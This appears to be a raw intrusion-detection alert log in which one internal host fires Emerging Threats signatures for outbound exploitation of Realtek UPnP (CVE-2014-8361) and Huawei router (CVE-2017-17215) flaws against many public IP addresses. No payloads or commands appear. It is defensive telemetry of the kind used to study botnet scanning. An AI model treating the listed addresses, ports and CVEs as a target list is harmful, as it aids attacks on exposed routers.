                                      07/20/24-23:01:20.598095TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4788652869192.168.2.23113.195.103.231
                                      07/20/24-23:01:42.778303TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4160852869192.168.2.2363.208.18.63
                                      07/20/24-23:01:47.995637TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25877452869192.168.2.2359.121.190.157
                                      07/20/24-23:01:44.670958TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24052052869192.168.2.23186.206.154.241
                                      07/20/24-23:01:48.445925TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4356452869192.168.2.2378.252.101.116
                                      07/20/24-23:01:24.867858TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5235837215192.168.2.23157.156.232.12
                                      07/20/24-23:01:41.380677TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3814852869192.168.2.23110.76.42.187
                                      07/20/24-23:01:58.146170TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24184452869192.168.2.23166.102.172.20
                                      07/20/24-23:01:24.885895TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4875437215192.168.2.2385.88.209.175
                                      07/20/24-23:01:45.030115TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4149052869192.168.2.23158.249.141.193
                                      07/20/24-23:01:45.175511TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4552052869192.168.2.2342.208.30.144
                                      07/20/24-23:01:54.979156TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24808852869192.168.2.2370.60.237.131
                                      07/20/24-23:01:44.757783TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24942652869192.168.2.2371.205.8.144
                                      07/20/24-23:01:51.517722TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3778252869192.168.2.23189.27.117.219
                                      07/20/24-23:01:27.650337TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5415237215192.168.2.23153.216.34.227
                                      07/20/24-23:01:02.104571TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4671837215192.168.2.2341.221.247.167
                                      07/20/24-23:01:44.640160TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25687452869192.168.2.2350.88.74.31
                                      07/20/24-23:00:59.192052TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5304437215192.168.2.23157.8.46.59
                                      07/20/24-23:01:00.639011TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5398037215192.168.2.23157.230.88.31
                                      07/20/24-23:01:27.650975TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5336837215192.168.2.23197.192.90.143
                                      07/20/24-23:01:45.713934TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24214452869192.168.2.23201.140.184.210
                                      07/20/24-23:01:47.940882TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5098052869192.168.2.2359.111.61.71
                                      07/20/24-23:01:42.966322TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614845052869192.168.2.2337.192.4.35
                                      07/20/24-23:01:49.352576TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24207252869192.168.2.2393.177.145.85
                                      07/20/24-23:01:09.021221TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25996652869192.168.2.2343.227.14.32
                                      07/20/24-23:01:44.868029TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4385452869192.168.2.23189.200.249.59
                                      07/20/24-23:01:52.161566TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4792452869192.168.2.2320.28.196.248
                                      07/20/24-23:01:08.677189TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3740052869192.168.2.23133.46.67.74
                                      07/20/24-23:01:53.625100TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4680852869192.168.2.2338.184.175.46
                                      07/20/24-23:00:57.223887TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5137637215192.168.2.2341.76.204.184
                                      07/20/24-23:01:02.456435TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613592452869192.168.2.2347.10.251.72
                                      07/20/24-23:01:40.336908TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4664637215192.168.2.2313.232.148.145
                                      07/20/24-23:01:34.044223TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5340837215192.168.2.23157.25.31.241
                                      07/20/24-23:01:41.205247TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613904252869192.168.2.23124.109.117.107
                                      07/20/24-23:01:50.313969TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4836852869192.168.2.23198.250.155.116
                                      07/20/24-23:01:41.405709TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616072252869192.168.2.23156.69.102.152
                                      07/20/24-23:01:59.063098TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5571452869192.168.2.2370.183.86.6
                                      07/20/24-23:02:20.410049TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23849252869192.168.2.2324.105.77.87
                                      07/20/24-23:01:34.044152TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5946237215192.168.2.23197.79.71.16
                                      07/20/24-23:01:00.638418TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3669837215192.168.2.23157.83.139.204
                                      07/20/24-23:02:06.935770TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3674852869192.168.2.2364.225.111.147
                                      07/20/24-23:01:20.140632TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3362037215192.168.2.2318.226.20.52
                                      07/20/24-23:01:24.894099TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5678037215192.168.2.23157.20.66.65
                                      07/20/24-23:01:44.099799TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5438652869192.168.2.23216.41.229.158
                                      07/20/24-23:01:11.636599TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5677837215192.168.2.23157.169.172.215
                                      07/20/24-23:01:20.592479TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23752652869192.168.2.23151.154.71.43
                                      07/20/24-23:01:14.013095TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4940637215192.168.2.23157.2.94.148
                                      07/20/24-23:01:08.575986TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4345252869192.168.2.23193.14.204.18
                                      07/20/24-23:01:54.859884TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23843052869192.168.2.2317.36.200.98
                                      07/20/24-23:01:11.820149TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6070437215192.168.2.23184.144.178.174
                                      07/20/24-23:01:49.011895TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5001652869192.168.2.23118.229.228.64
                                      07/20/24-23:01:53.261844TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3620452869192.168.2.2371.66.59.209
                                      07/20/24-23:01:46.961079TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615010252869192.168.2.2380.12.29.225
                                      07/20/24-23:01:56.127051TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616047052869192.168.2.23205.96.176.194
                                      07/20/24-23:01:08.659435TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25207452869192.168.2.23132.182.11.252
                                      07/20/24-23:01:55.572517TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614520852869192.168.2.23213.9.81.218
                                      07/20/24-23:01:45.134490TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3473252869192.168.2.2337.158.125.18
                                      07/20/24-23:01:31.316196TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5975052869192.168.2.23186.254.145.51
                                      07/20/24-23:01:41.328264TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4447252869192.168.2.2334.239.73.219
                                      07/20/24-23:01:01.479730TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614672852869192.168.2.2313.18.63.141
                                      07/20/24-23:01:20.149798TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5294837215192.168.2.2341.79.99.46
                                      07/20/24-23:01:58.364551TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25507052869192.168.2.2363.226.8.25
                                      07/20/24-23:01:59.096276TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4362052869192.168.2.23120.123.66.167
                                      07/20/24-23:01:40.331150TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3860637215192.168.2.2374.131.241.182
                                      07/20/24-23:01:52.720668TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23628652869192.168.2.23210.199.180.209
                                      07/20/24-23:01:41.328264TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613972252869192.168.2.23213.180.197.99
                                      07/20/24-23:01:08.609855TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23831052869192.168.2.2347.10.251.72
                                      07/20/24-23:01:00.636533TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4516437215192.168.2.2341.244.169.9
                                      07/20/24-23:01:47.231819TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4589652869192.168.2.2394.187.41.215
                                      07/20/24-23:01:52.609595TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3330652869192.168.2.23132.173.198.51
                                      07/20/24-23:01:53.697003TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615518252869192.168.2.23138.65.97.97
                                      07/20/24-23:01:41.533244TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615751452869192.168.2.23218.79.146.2
                                      07/20/24-23:01:21.915268TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5432037215192.168.2.23197.79.255.113
                                      07/20/24-23:02:00.856771TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24237052869192.168.2.23164.216.95.45
                                      07/20/24-23:00:57.222128TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3876437215192.168.2.2360.176.144.80
                                      07/20/24-23:01:44.210939TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4726652869192.168.2.2338.105.221.242
                                      07/20/24-23:01:08.686799TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23600052869192.168.2.23219.114.72.114
                                      07/20/24-23:01:20.592206TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23485852869192.168.2.2385.161.3.79
                                      07/20/24-23:01:42.115230TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24886852869192.168.2.23156.42.191.231
                                      07/20/24-23:01:44.411586TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613747652869192.168.2.2387.132.55.249
                                      07/20/24-23:01:27.766239TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5378237215192.168.2.23197.105.4.242
                                      07/20/24-23:01:24.929013TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5067637215192.168.2.23157.51.204.149
                                      07/20/24-23:01:43.305781TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5000452869192.168.2.23207.164.129.53
                                      07/20/24-23:01:44.765093TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24687052869192.168.2.2360.118.116.115
                                      07/20/24-23:01:45.569319TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5133452869192.168.2.2393.25.182.143
                                      07/20/24-23:01:07.054782TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4690037215192.168.2.2341.0.81.109
                                      07/20/24-23:01:11.817771TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6009837215192.168.2.2394.180.106.123
                                      07/20/24-23:00:59.148144TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6031237215192.168.2.2341.73.125.205
                                      07/20/24-23:01:13.185981TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5903052869192.168.2.23218.129.227.171
                                      07/20/24-23:01:46.929722TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614055052869192.168.2.23146.185.97.186
                                      07/20/24-23:00:57.221646TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5750237215192.168.2.23157.189.184.171
                                      07/20/24-23:01:01.473903TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5287252869192.168.2.23173.57.134.38
                                      07/20/24-23:00:59.204975TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5370637215192.168.2.23157.34.104.183
                                      07/20/24-23:01:26.849112TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3278037215192.168.2.2341.245.227.231
                                      07/20/24-23:01:46.298100TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615735252869192.168.2.23203.221.6.21
                                      07/20/24-23:01:49.033216TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4775052869192.168.2.231.7.30.66
                                      07/20/24-23:01:07.075937TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5102037215192.168.2.23157.136.153.134
                                      07/20/24-23:01:48.376233TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4213052869192.168.2.23101.42.79.184
                                      07/20/24-23:01:51.056493TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3690652869192.168.2.2370.101.195.243
                                      07/20/24-23:01:04.147433TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3455852869192.168.2.23201.250.207.152
                                      07/20/24-23:01:08.663245TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23719052869192.168.2.2399.2.133.89
                                      07/20/24-23:01:25.215598TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614982852869192.168.2.2332.85.156.168
                                      07/20/24-23:01:08.631492TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4435852869192.168.2.23223.193.169.99
                                      07/20/24-23:01:27.666100TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4115037215192.168.2.23148.251.22.209
                                      07/20/24-23:01:40.311124TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5095237215192.168.2.23197.136.132.148
                                      07/20/24-23:01:44.779503TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4516852869192.168.2.23147.163.143.195
                                      07/20/24-23:01:47.858878TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615414252869192.168.2.2334.139.90.241
                                      07/20/24-23:01:53.428577TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5168452869192.168.2.23148.27.255.148
                                      07/20/24-23:01:58.892811TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614401052869192.168.2.2367.241.234.23
                                      07/20/24-23:01:40.290003TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3835437215192.168.2.23157.4.24.226
                                      07/20/24-23:01:24.898476TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4842037215192.168.2.23197.0.21.49
                                      07/20/24-23:01:32.046185TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5100437215192.168.2.23151.83.52.203
                                      07/20/24-23:01:42.477986TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4505252869192.168.2.2382.187.47.45
                                      07/20/24-23:01:08.683685TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23334452869192.168.2.23117.76.49.30
                                      07/20/24-23:00:57.222163TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4417437215192.168.2.23197.38.235.14
                                      07/20/24-23:01:44.813013TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615566452869192.168.2.2353.132.125.29
                                      07/20/24-23:01:24.934977TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5096637215192.168.2.23197.31.197.218
                                      07/20/24-23:01:51.266026TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5032052869192.168.2.23120.82.97.31
                                      07/20/24-23:01:24.929013TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4484237215192.168.2.2372.254.44.143
                                      07/20/24-23:01:21.943544TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4403237215192.168.2.23197.246.88.6
                                      07/20/24-23:01:41.331701TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615074052869192.168.2.23159.130.44.143
                                      07/20/24-23:01:51.144153TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24054252869192.168.2.23223.123.26.129
                                      07/20/24-23:01:04.098080TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3851837215192.168.2.2325.81.242.112
                                      07/20/24-23:01:44.729296TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5123652869192.168.2.23173.58.223.243
                                      07/20/24-23:01:43.555329TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613394452869192.168.2.23217.141.116.135
                                      07/20/24-23:01:50.030683TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5674852869192.168.2.23125.188.157.139
                                      07/20/24-23:01:53.807714TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4994252869192.168.2.23107.137.22.219
                                      07/20/24-23:01:14.049603TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3978437215192.168.2.23157.38.188.109
                                      07/20/24-23:01:13.710739TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4408252869192.168.2.2336.168.150.31
                                      07/20/24-23:01:11.632393TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5177237215192.168.2.23204.214.250.6
                                      07/20/24-23:01:42.915640TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613286252869192.168.2.2312.188.189.35
                                      07/20/24-23:01:47.455725TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613952452869192.168.2.2367.67.248.34
                                      07/20/24-23:01:08.655109TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4087852869192.168.2.23205.29.56.156
                                      07/20/24-23:01:53.059916TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615415452869192.168.2.2327.236.237.70
                                      07/20/24-23:00:57.222254TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5274037215192.168.2.23149.227.100.108
                                      07/20/24-23:01:49.170008TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4085652869192.168.2.2390.144.20.22
                                      07/20/24-23:01:08.684499TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24288652869192.168.2.2324.106.184.126
                                      07/20/24-23:01:43.300793TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23678852869192.168.2.2347.244.160.188
                                      07/20/24-23:01:51.483441TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3391652869192.168.2.2396.23.98.70
                                      07/20/24-23:01:46.483452TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24204252869192.168.2.23150.183.171.74
                                      07/20/24-23:01:42.891313TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614933052869192.168.2.23155.182.30.66
                                      07/20/24-23:01:47.474975TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4870052869192.168.2.2388.171.168.15
                                      07/20/24-23:01:08.565561TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5171052869192.168.2.2370.239.61.12
                                      07/20/24-23:01:41.449345TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4210652869192.168.2.23174.130.13.191
                                      07/20/24-23:02:00.396073TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5232252869192.168.2.2349.133.161.207
                                      07/20/24-23:01:41.323363TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4901052869192.168.2.23191.235.3.135
                                      07/20/24-23:01:44.757783TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4503052869192.168.2.23106.184.161.191
                                      07/20/24-23:01:08.563416TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24221852869192.168.2.23172.95.79.32
                                      07/20/24-23:01:20.161614TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3851837215192.168.2.2341.71.153.133
                                      07/20/24-23:01:42.164492TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614865652869192.168.2.2375.52.105.57
                                      07/20/24-23:01:43.133950TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3913652869192.168.2.23187.122.130.75
                                      07/20/24-23:01:04.973966TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613389652869192.168.2.23219.114.72.114
                                      07/20/24-23:01:27.650871TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5283837215192.168.2.2341.119.213.132
                                      07/20/24-23:01:54.826949TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5312052869192.168.2.2340.172.192.128
                                      07/20/24-23:01:52.250832TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23310652869192.168.2.23133.79.190.240
                                      07/20/24-23:01:08.619597TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4058452869192.168.2.23207.112.16.238
                                      07/20/24-23:01:41.290281TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613522252869192.168.2.23175.222.36.60
                                      07/20/24-23:01:07.114267TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4167437215192.168.2.2359.163.139.170
                                      07/20/24-23:02:17.269055TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5142052869192.168.2.2391.117.171.160
                                      07/20/24-23:01:00.633389TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4134037215192.168.2.23197.95.169.228
                                      07/20/24-23:01:07.016889TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4053437215192.168.2.23157.126.215.99
                                      07/20/24-23:01:31.976795TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5310237215192.168.2.23157.170.56.215
                                      07/20/24-23:01:40.286738TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5164637215192.168.2.2379.246.175.175
                                      07/20/24-23:01:03.975418TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4170037215192.168.2.2341.142.6.246
                                      07/20/24-23:01:43.210798TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24647252869192.168.2.23173.144.227.253
                                      07/20/24-23:01:47.902509TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4907852869192.168.2.23162.84.55.247
                                      07/20/24-23:00:59.157444TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4848237215192.168.2.23197.160.117.109
                                      07/20/24-23:01:04.098909TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3651037215192.168.2.23157.104.12.239
                                      07/20/24-23:01:20.096752TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5942837215192.168.2.23197.58.20.251
                                      07/20/24-23:01:44.452219TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614853652869192.168.2.2336.88.70.103
                                      07/20/24-23:01:47.906061TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3498652869192.168.2.2363.194.155.21
                                      07/20/24-23:01:10.501913TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5556652869192.168.2.2385.213.237.39
                                      07/20/24-23:01:06.990535TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4565637215192.168.2.23197.81.177.106
                                      07/20/24-23:01:41.534135TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4600852869192.168.2.23141.211.193.35
                                      07/20/24-23:01:34.050313TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4996237215192.168.2.23157.34.203.66
                                      07/20/24-23:01:43.977046TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5852052869192.168.2.2379.130.195.101
                                      07/20/24-23:01:40.291616TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4971837215192.168.2.2341.207.12.33
                                      07/20/24-23:01:04.040812TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5125837215192.168.2.23209.77.38.74
